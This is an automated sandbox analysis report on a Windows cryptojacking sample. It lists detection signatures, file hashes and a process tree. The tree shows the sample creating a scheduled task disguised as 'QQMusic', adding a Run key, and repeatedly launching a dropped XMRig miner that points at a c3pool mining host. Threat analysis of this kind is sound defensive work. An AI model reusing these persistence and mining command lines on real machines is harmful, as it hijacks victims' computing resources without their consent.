Overview

overview

10

Static

static

10

d6350d8a66...60.exe

windows7-x64

10

d6350d8a66...60.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-06-2024 02:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe

  • Size

    9.0MB

  • MD5

    a2af48a018c65d34b445bd35bdd1b597

  • SHA1

    76daedc184a0cb9a717fc49f86a57b5baed0a35c

  • SHA256

    d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60

  • SHA512

    d8def07a8accdb65b6b9dfc3168981b600a78310ec06cb626fcd000e7bcc4627ff5be7fc9f26992838226d84982ddd470d9ac89e041727e72b738a61bec61319

  • SSDEEP

    196608:rhHMBGC3PtXtT+Was8ywq1wo9JoYx5JAMdJOnZTG1IvQSaKe6NZOn:r2G0jwuwasMdJOnZKVSaaNZOn

Score
10/10
xmrigminerpersistenceupx

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Detects Windows executables referencing non-Windows User-Agents 1 IoCs
  • UPX dump on OEP (original entry point) 19 IoCs
  • XMRig Miner payload 17 IoCs
    miner
  • Executes dropped EXE 19 IoCs
  • UPX packed file 19 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Gathers network information 2 TTPs 4 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 9 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe
    "C:\Users\Admin\AppData\Local\Temp\d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Checks for VirtualBox DLLs, possible anti-VM trick
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4880
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4496
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe /F
        3⤵
        • Creates scheduled task(s)
        PID:3288
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c taskkill /f /im 2HIf.exe&&exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5036
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im 2HIf.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1716
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ipconfig /flushdns
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4488
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig /flushdns
        3⤵
        • Gathers network information
        PID:4976
    • C:\ProgramData\2HIf.exe
      C:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3232
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c taskkill /f /im 2HIf.exe&&exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3504
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im 2HIf.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4868
    • C:\ProgramData\2HIf.exe
      C:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1836
    • C:\ProgramData\2HIf.exe
      C:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3164
    • C:\ProgramData\SMB.exe
      C:\ProgramData\SMB.exe
      2⤵
      • Executes dropped EXE
      PID:4396
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c taskkill /f /im 2HIf.exe&&exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4628
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im 2HIf.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4836
    • C:\ProgramData\2HIf.exe
      C:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4652
    • C:\ProgramData\2HIf.exe
      C:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1952
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ipconfig /flushdns
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1148
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig /flushdns
        3⤵
        • Gathers network information
        PID:5028
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c taskkill /f /im 2HIf.exe&&exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5736
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im 2HIf.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:5864
    • C:\ProgramData\2HIf.exe
      C:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:5788
    • C:\ProgramData\2HIf.exe
      C:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:5988
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c taskkill /f /im 2HIf.exe&&exit
      2⤵
        PID:828
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im 2HIf.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4740
      • C:\ProgramData\2HIf.exe
        C:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1816
      • C:\ProgramData\2HIf.exe
        C:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:6100
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c taskkill /f /im 2HIf.exe&&exit
        2⤵
          PID:5788
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im 2HIf.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:6088
        • C:\ProgramData\2HIf.exe
          C:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
          2⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:6020
        • C:\ProgramData\2HIf.exe
          C:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
          2⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:3236
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ipconfig /flushdns
          2⤵
            PID:6168
            • C:\Windows\SysWOW64\ipconfig.exe
              ipconfig /flushdns
              3⤵
              • Gathers network information
              PID:6220
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c taskkill /f /im 2HIf.exe&&exit
            2⤵
              PID:6304
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im 2HIf.exe
                3⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:6400
            • C:\ProgramData\2HIf.exe
              C:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
              2⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:6348
            • C:\ProgramData\2HIf.exe
              C:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
              2⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:6480
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c taskkill /f /im 2HIf.exe&&exit
              2⤵
                PID:6612
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im 2HIf.exe
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:6716
              • C:\ProgramData\2HIf.exe
                C:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
                2⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:6652
              • C:\ProgramData\2HIf.exe
                C:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
                2⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:6784
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ipconfig /flushdns
                2⤵
                  PID:6900
                  • C:\Windows\SysWOW64\ipconfig.exe
                    ipconfig /flushdns
                    3⤵
                    • Gathers network information
                    PID:6952
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c taskkill /f /im 2HIf.exe&&exit
                  2⤵
                    PID:6980
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im 2HIf.exe
                      3⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:7084
                  • C:\ProgramData\2HIf.exe
                    C:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:7020
                  • C:\ProgramData\2HIf.exe
                    C:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:7164
                • C:\Users\Admin\AppData\Local\Temp\d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe
                  C:\Users\Admin\AppData\Local\Temp\d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe
                  1⤵
                  • Executes dropped EXE
                  • Checks for VirtualBox DLLs, possible anti-VM trick
                  PID:5920

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\ProgramData\2HIf.exe
                  Filesize

                  1.3MB

                  MD5

                  23d84a7ed2e8e76d0a13197b74913654

                  SHA1

                  23d04ba674bafbad225243dc81ce7eccd744a35a

                  SHA256

                  ac530d542a755ecce6a656ea6309717ec222c34d7e34c61792f3b350a8a29301

                  SHA512

                  aa6b0100d477214d550b6498787190fc1a8fafa7c478f9595d45e4e76ece9888b84dcca26696500d5710a9d1acae4810f2606d8962c46d31f2bdfcdd27bd675c

                  Download Submit

                • C:\ProgramData\SMB.exe
                  Filesize

                  3.1MB

                  MD5

                  7b2f170698522cd844e0423252ad36c1

                  SHA1

                  303ac0aaf0e9f48d4943e57d1ee6c757f2dd48c5

                  SHA256

                  5214f356f2e8640230e93a95633cd73945c38027b23e76bb5e617c71949f8994

                  SHA512

                  7155477e6988a16f6d12a0800ab72b9b9b64b97a509324ac0669cec2a4b82cd81b3481ae2c2d1ce65e73b017cebb56628d949d6195aac8f6ddd9625a80789dfa

                  Download Submit

                • C:\ProgramData\X64.dll
                  Filesize

                  85KB

                  MD5

                  44bd764a941ca97a85c301566835cf22

                  SHA1

                  2e4b3df2a6b26cc97865b392d70cb495496e6f83

                  SHA256

                  1df8a059c13cf1604cca880ad646b76e8a18a3860437d84ec2b6b4e36f61c3e1

                  SHA512

                  2db04d788646137be8d545138f67f6ce954791bb6b3b2d0221c22e85b8a86b673329452c1df6ed062df569fd80aa97e5e7c77c747ead15b0afae057a814882be

                  Download Submit

                • C:\ProgramData\X86.dll
                  Filesize

                  71KB

                  MD5

                  74024b2ab5376c5471c2597ea721ad0d

                  SHA1

                  b0f4e38d3c99440b921486e240ccbde82fa57e2b

                  SHA256

                  84b0e67582f7d9f744896f11b7c68ce1ae57dc9f0019b8cd2a470976f0bbb432

                  SHA512

                  9949ee5a5fa212b7c9ff1ed2f00a10d5ba75945f5ae092461b4cf0cbfd1275ca05c71e4e15ebeccc4665e62be07cb04982132d08ff40d985454b17804fedc805

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60.exe
                  Filesize

                  9.0MB

                  MD5

                  a2af48a018c65d34b445bd35bdd1b597

                  SHA1

                  76daedc184a0cb9a717fc49f86a57b5baed0a35c

                  SHA256

                  d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60

                  SHA512

                  d8def07a8accdb65b6b9dfc3168981b600a78310ec06cb626fcd000e7bcc4627ff5be7fc9f26992838226d84982ddd470d9ac89e041727e72b738a61bec61319

                  Download Submit

                • memory/1816-168-0x00007FF788180000-0x00007FF7887C4000-memory.dmp

                  Filesize

                  6.3MB

                  Download

                • memory/1836-19-0x00007FF788180000-0x00007FF7887C4000-memory.dmp

                  Filesize

                  6.3MB

                  Download

                • memory/1952-156-0x00007FF788180000-0x00007FF7887C4000-memory.dmp

                  Filesize

                  6.3MB

                  Download

                • memory/3164-145-0x00007FF788180000-0x00007FF7887C4000-memory.dmp

                  Filesize

                  6.3MB

                  Download

                • memory/3164-143-0x00007FF788180000-0x00007FF7887C4000-memory.dmp

                  Filesize

                  6.3MB

                  Download

                • memory/3232-15-0x00007FF788180000-0x00007FF7887C4000-memory.dmp

                  Filesize

                  6.3MB

                  Download

                • memory/3232-10-0x000002BF95B50000-0x000002BF95B64000-memory.dmp

                  Filesize

                  80KB

                  Download

                • memory/3232-8-0x00007FF788180000-0x00007FF7887C4000-memory.dmp

                  Filesize

                  6.3MB

                  Download

                • memory/3236-184-0x00007FF788180000-0x00007FF7887C4000-memory.dmp

                  Filesize

                  6.3MB

                  Download

                • memory/4652-149-0x00007FF788180000-0x00007FF7887C4000-memory.dmp

                  Filesize

                  6.3MB

                  Download

                • memory/5788-159-0x00007FF788180000-0x00007FF7887C4000-memory.dmp

                  Filesize

                  6.3MB

                  Download

                • memory/5988-164-0x00007FF788180000-0x00007FF7887C4000-memory.dmp

                  Filesize

                  6.3MB

                  Download

                • memory/6020-176-0x00007FF788180000-0x00007FF7887C4000-memory.dmp

                  Filesize

                  6.3MB

                  Download

                • memory/6100-172-0x00007FF788180000-0x00007FF7887C4000-memory.dmp

                  Filesize

                  6.3MB

                  Download

                • memory/6348-188-0x00007FF788180000-0x00007FF7887C4000-memory.dmp

                  Filesize

                  6.3MB

                  Download

                • memory/6480-192-0x00007FF788180000-0x00007FF7887C4000-memory.dmp

                  Filesize

                  6.3MB

                  Download

                • memory/6652-195-0x00007FF788180000-0x00007FF7887C4000-memory.dmp

                  Filesize

                  6.3MB

                  Download

                • memory/6784-199-0x00007FF788180000-0x00007FF7887C4000-memory.dmp

                  Filesize

                  6.3MB

                  Download

                • memory/7020-203-0x00007FF788180000-0x00007FF7887C4000-memory.dmp

                  Filesize

                  6.3MB

                  Download